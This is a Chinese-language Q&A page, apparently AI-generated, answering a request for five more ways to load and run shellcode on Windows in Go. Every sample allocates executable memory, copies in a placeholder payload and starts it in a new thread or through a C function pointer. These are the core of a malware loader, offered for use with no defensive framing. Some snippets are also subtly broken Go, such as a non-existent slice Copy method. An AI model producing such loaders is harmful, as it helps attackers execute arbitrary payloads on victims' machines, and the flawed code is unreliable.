有其他不同加载shellcode类型的例子举例再举例五个package mainimport syscall unsafefunc main shellcode = byteshellcode allocatedMemory _ _ = syscallSyscall6syscallNewLazyDLLkernel32dllNewProcVirtualAllocAddr 4 0 uintptrl
以下是加载shellcode的几种不同方式的示例:
- 使用syscall.Syscall6加载shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用reflect.Value.Call加载shellcode:
package main
import (
"reflect"
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
virtualAlloc := syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc")
rtlMoveMemory := syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory")
createThread := syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread")
allocatedMemory := reflect.ValueOf(virtualAlloc.Call(0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)[0])
rtlMoveMemory.Call(allocatedMemory.Interface(), uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
createThread.Call(0, 0, allocatedMemory.Interface(), 0, 0, 0)
}
- 使用unsafe.Pointer加载shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
shellcodePointer := unsafe.Pointer(&shellcode[0])
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(shellcodePointer), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用unsafe.Unsafe加载shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
shellcodePointer := unsafe.Pointer(&shellcode[0])
unsafe.Slice((*byte)(allocatedMemory), len(shellcode)).Copy(shellcodePointer, len(shellcode))
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用C语言加载shellcode:
package main
// #include <stdlib.h>
// #include <Windows.h>
//
// void executeShellcode()
// {
// unsigned char shellcode[] = <shellcode>;
// void* allocatedMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// memcpy(allocatedMemory, shellcode, sizeof(shellcode));
// ((void(*)())allocatedMemory)();
// }
import "C"
func main() {
C.executeShellcode()
}
请注意,上述示例中的<shellcode>应替换为实际的shellcode字节码
原文地址: https://www.cveoy.top/t/topic/hN42 著作权归作者所有。请勿转载和采集!